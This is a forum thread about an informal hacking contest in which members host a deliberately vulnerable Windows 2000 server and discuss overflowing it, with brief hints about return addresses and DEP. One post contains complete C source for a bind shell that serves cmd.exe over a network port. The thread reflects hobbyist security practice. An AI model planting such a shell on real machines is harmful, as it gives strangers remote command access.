
Security practice (contest)


Comments

  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    conceited wrote: »
    Funny thing for an ISP to do, isn't it. I wonder what's their reason for doing such a thing?

    Many did this to stop Windows-specific worms spreading like crazy years ago.




    Will the next challenge require a unique or self-made exploit?


  • Closed Accounts Posts: 891 ✭✭✭conceited


    That was ages ago.
    I was busy all day today, thought I'd have time but hadn't enough.
    Tomorrow I'm not so busy so I'll have something ready for the evening.
    Not sure exactly what yet. And if I did I wouldn't tell ya. :pac:


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Should be good fun.

    Maybe you should start a new thread for the next challenge?


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Hi damo,

    I have a great idea in my head for a challenge and thought programs would be available, but they're not.
    To implement it I'll have to write my own programs. I've no idea how long this will take either, as it's a small bit complicated.

    If you want, lads, I can still host some servers in the meantime for you to practice on. Today I set up an operating system but it might be too difficult. I dunno, let me know.


  • Closed Accounts Posts: 13 C\m\C


    Lo all

    I rate myself best man in the country apart from my own people.
    I'm out of retirement, yes I'm back.
    What is the prize for the contest?
    I'm rusty these days, bring it on!


  • Registered Users Posts: 1,726 ✭✭✭gerryk


    Out of retirement, eh? Things may have changed since your day, ol' man :D


  • Closed Accounts Posts: 63 ✭✭Stamen


    Sounds interesting...


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    This is a challenge I've been working on. It's not fully finished but it could be fun.
    Its difficulty would be medium to hard. It's designed to work on Windows 2000 SP0-SP4 or Windows XP SP0-SP1. It may be possible to have this challenge for Windows XP SP2/3, however that would be a lot more difficult (on the challenger's part :) ).

    Using public security scanners would be no good, as it's a custom tool I made, and will require its own unique attack/exploit. Metasploit or the likes are no good here.

    It's not fully finished and I need to sort some things out, like if the server crashes (due to attack!?!) that it will automatically restart and stuff like that.

    I will probably need someone who has a stable connection to host it. It can be in a virtual machine. Actually I'd recommend it be in a virtual machine if you don't have an old box lying around. You don't want it on your main OS :-D

    Here are some snaps of the challenge. Obviously I don't show you the internals of the attack, just it working :)


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q




  • Closed Accounts Posts: 891 ✭✭✭conceited


    Alright Damo.

    That challenge looks really interesting. I have no bother hosting as long as you give me the source for the server/client.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Yes, that's understandable. I also don't have thread support so it'll only take 1 connection at a time.

    Also we need to use FireDaemon or Application as Service so when the program terminates, the daemon will restart it.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    That's going to be some challenge :)
    1 connection a time is loads anyway for something like this.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Don't mean to interfere with what you're doing, Damo.
    While writing 64-bit shellcodes, I used the following as an example.
    
    
    #include <stdio.h>
    #include <winsock2.h>
    #pragma comment(lib, "ws2_32.lib")   /* link against Winsock (MSVC) */

    /* One thread per accepted client: start cmd.exe with its standard
       handles redirected to the client socket, wait for it to exit,
       then close the socket. */
    DWORD WINAPI ThreadProc(LPVOID lpParameter)
    {
        PROCESS_INFORMATION pi;
        STARTUPINFO si;
        char cmdline[] = "cmd";   /* CreateProcess may modify this buffer, so no literal */

        ZeroMemory(&si, sizeof(si));
        ZeroMemory(&pi, sizeof(pi));

        si.cb         = sizeof(si);
        si.hStdError  = (HANDLE)lpParameter;
        si.hStdInput  = (HANDLE)lpParameter;
        si.hStdOutput = (HANDLE)lpParameter;
        si.dwFlags    = STARTF_USESTDHANDLES;

        /* bInheritHandles = TRUE so the child inherits the socket handle */
        CreateProcess(NULL, cmdline, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
        WaitForSingleObject(pi.hProcess, INFINITE);

        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);

        closesocket((SOCKET)lpParameter);
        ExitThread(0);
        return 0;
    }

    int main(int argc, char **argv)
    {
        WSADATA wsaData;
        SOCKADDR_IN service;
        SOCKET server, client;

        if (WSAStartup(MAKEWORD(2, 0), &wsaData) == 0) {

            if ((server = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_IP, NULL, 0, 0)) != INVALID_SOCKET) {

                service.sin_addr.S_un.S_addr = INADDR_ANY;
                service.sin_port             = htons(1234);
                service.sin_family           = AF_INET;

                if (!bind(server, (SOCKADDR *)&service, sizeof(service))) {

                    /* backlog of 0: raise this if several clients should queue */
                    if (!listen(server, 0)) {

                        /* accept() returns INVALID_SOCKET on failure */
                        while ((client = accept(server, 0, 0)) != INVALID_SOCKET) {

                            /* hand the client socket to a worker thread; the thread
                               handle itself is not needed, so close it straight away */
                            CloseHandle(CreateThread(NULL, 0, ThreadProc, (LPVOID)client, 0, NULL));
                        }
                    }
                }
                closesocket(server);
            }
            WSACleanup();
        }
        return 0;
    }
    

    But if you'd rather have 1 connection at a time, that's fine.
    Actually, you might have to edit the listen() parameter...


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Cheers Average Joe, but I'll leave it, I'm not great at coding :-)


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    C:\>nc xxx.xxx.xxx.xxx 54333
    Welcome to Damo's security challenge.
    You have to try and get access to this server.

    The server OS is Windows 2000 SP4 (english)
    Only this port (54333) is open.
    The server is running Damo's SecContest v1.0
    Download: http://damohere.freehostia.com/seccontest.zip
    That's all the infomation you are getting...

    Rules are:
    1. Download and debug the server locally on your own machine.
    2. Find a weakness inthe server.
    3. Code an exploit for the server.
    4. Test this exploit on your own machines.
    NOTE: when and only when this exploit works for you, then launch the attack against the server we hosted.
    REMINDER: Win 2000 SP4!
    We say get the exploit working in your own environment first as if you crash the server due to a bad exploit (we don't want DoS :), it has to be manually restarted.
    5. When you get access, put your name in a .txt on the Administrator's Desktop
    6. No ill behaviour

    Please enter your name: Damo

    Thank you! Goodbye...


    conceited will post the IP later when it's up. For now, you can start debugging the executable in the link above. :-)


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Cool.
    Can you email it to me please, I think my 3G phone is blocking the connection to the file.. :(
    I get redirected to freehostia.com


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Done.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Using DynDNS in case my IP changes, here's the link for the server.
    hostname : conceited.homeunix.org

    Damo, your file can't be downloaded by me either. Here's a link to the one you gave me just in case you're not online.
    seccontest.zip


    Thanks a lot Damo2k


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    edit.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    If you overflow it on a WinXP machine, then you're almost there. Just remember one little thing will have a different address on 2k SP4.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    I'm just wondering, if your program will run in a VM as planned, what difference will this make?
    How would it affect the overflow?


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I coded and tested it in vmware. It should be fine.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Ah Joe, why are you posting all this info?


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    OK, sorry, it's removed.
    Just thought it would help interest others.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I think if you get the exploit working on your own Win2k SP0-1 / WinXP SP0-1, it's just a matter of changing one little thing to make it work on the desired OS.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    So you're saying if it works on Win2k SP0, it will work on SP4 too?
    I'm about to set up a Win2k machine, but probably won't do anything tonight.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    There is only one little thing different between the OSs (coming from a "goto esp" point of view); most of the shellcode should be the same.
    XP SP2 introduced DEP, which makes things harder.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Guys, the server is up and I can confirm that it is exploitable... see snapshot.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Best challenge so far.
    I'm having a crack at it now and will be for the whole day.
    Thanks Damo. :pac: Nice challenge.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Is anyone making progress?

